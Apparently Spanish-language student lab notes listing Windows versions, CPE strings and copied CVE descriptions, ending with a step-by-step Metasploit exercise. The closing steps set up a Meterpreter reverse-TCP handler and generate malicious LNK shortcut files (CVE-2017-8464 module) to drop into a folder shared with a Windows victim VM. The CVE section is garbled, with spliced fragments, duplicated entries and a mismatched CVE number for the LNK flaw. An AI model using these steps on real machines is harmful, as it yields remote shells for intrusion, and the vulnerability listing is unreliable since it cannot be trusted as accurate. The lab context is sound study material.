Sistemas operativos:
windows 7
windows 8.1
windows RT 8.1
Windows server 2008:sp2
windows server 2008 R2:sp1
windows server 2012
windows server 2012 R2
windows server 2016
windows_10:1511
windows_10:1607
windows_10:1703
windows_7:sp1
windows_8

Software 
Tipo de producto: sistema operativo
Se usa Microsoft con distintas versiones de Windows. 
cpe:2.3:o:microsoft:windows_10:1511
cpe:2.3:o:microsoft:windows_10:1607
cpe:2.3:o:microsoft:windows_10:1703
cpe:2.3:o:microsoft:windows_7:-:sp1
cpe:2.3:o:microsoft:windows_8
cpe:2.3:o:microsoft:windows_8.1
cpe:2.3:o:microsoft:windows_8.1:rt
cpe:2.3:o:microsoft:windows_server_2008:*:sp2
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1
cpe:2.3:o:microsoft:windows_server_2012
cpe:2.3:o:microsoft:windows_server_2012:r2
 cpe:2.3:o:microsoft:windows_server_2016

Vulnerabilidades 

Windows 10 1511 
CVE ID: CVE-2018-8251 
CWE ID: 119 
Vulnerability type:Overflow Mem. Corr.
A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory,
aka "Media Foundation Memory Corruption Vulnerability." This affects Windows 7, Windows Server 2012 R2,
Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

CVE ID: 	CVE-2018-8124
CWE ID: 264
Vulnerability type:Overflow Mem. Corr.
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly
handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, 
Windows Server 2012 R2, Windows RT 8: 	CVE-2019-0583.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016,
Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8120, CVE-2018-8164, CVE-2018-8166.

CVE ID: 	CVE-2018-8116
CWE ID: 119
Vulnerability type:DoS Overflow
A denial of service vulnerability exists in the way that Windows handles objects in memory, 
aka "Microsoft Graphics Component Denial of Service Vulnerability." This affects Windows 7,
Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1,
Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.

Windows 10 1607: 
CVE ID: CVE-2019-0584
CWE ID: 	119
Vulnerability type:Overflow Mem. Corr.
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly 
handles objects in memory, aka "Jet Database Engine Remote Code Execution Vulnerability." 
This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, 
Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. 
This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579, 
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0583.

CVE ID: 	CVE-2019-0583
CWE ID: 119
Vulnerability type:Overflow Mem. Corr.
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly 
handles objects in memory, aka "Jet Database Engine Remote Code Execution Vulnerability."
This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019,
Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579, 
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0584.

CVE ID:	CVE-2019-0582
CWE ID: 119
Vulnerability Type(s): Exec Code Overflow: 	119	
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, 
aka "Jet Database Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0583, CVE-2019-0584.

Windows 7 SP1
CVE ID: 	CVE-2019-0584
CWE ID: 	119	
Vulnerability Type(s): Exec Code Overflow
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, 
aka "Jet Database Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0583.

CVE ID: 	CVE-2019-0583
CWE ID: 119
Vulnerability Type(s): Exec Code Overflow
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory,
aka "Jet Database Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0582, CVE-2019-0584.

CVE ID: 	CVE-2019-0582
CWE ID: 119
Vulnerability Type(s): Exec Code Overflow
A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, 
aka "Jet Database Engi: 	200ne Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1,
Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10,
Windows 10 Servers. This CVE ID is unique from CVE-2019-0538, CVE-2019-0575, CVE-2019-0576, CVE-2019-0577, CVE-2019-0578, CVE-2019-0579,
CVE-2019-0580, CVE-2019-0581, CVE-2019-0583, CVE-2019-0584.

Windows 8
CVE ID: 	CVE-2018-7250
CWE ID: 	200
Vulnerability Type(s): +Info
An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, 
Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. An uninitialized kernel pool allocation in
IOCTL 0xCA002813 allows a local unprivileged attacker to leak 16 bits of uninitialized kernel PagedPool data.

CVE ID: CVE-2018-7249
CWE ID: 		416
Vulnerability Type(s): DoS +Priv
An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, 
Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. Two carefully timed calls 
to IOCTL 0xCA002813 can cause a race condition that leads to a use-after-free. When exploited, an unprivileged attacker
can run arbitrary code in the kernel.

CVE ID: 		CVE-2018-6947
CWE ID: 264
Vulnerability Type(s): 	Exec Code
Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, 
Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 
allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly 
handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka "LNK 
Remote Code Execution Vulnerability."


Explicación Práctica

1- Abrir Kali y abrir CMD
2- Instalar una maquina virtual de Windows, no s epuede utilizar windows XP
3- Abrir la maquina virtual que se instaló de Windows
4- Abrir la consola en kali
msfconsole
5- hacer exploit
use exploit/multi/handler
6- set payload windows/meterpreter/reverse_tcp
7- set LHOST 10.191.4.4(mi ip)
8- show options (para verificar puerto)
9- exploit -j
10- back
11- use exploit/windows/fileformat/cve_2017_8464_lnk_rce(creo los archivos)
12- set payload windows/x64/meterpreter/reverse_tcp
13- set LHOST 10.191.4.4(mi ip)
14- show options
15- exploit (hago exploit y aparecen los archivos)
16- abro otro cmd para verificar la dirección de los archivos
17- xdg-open /roor/.msf4/local/
18- copio los archivos creados en la carpeta compartida
19- la carpeta compartida también la comparto en windows
20- verifico si los archivos quedaron en la carpeta compartida















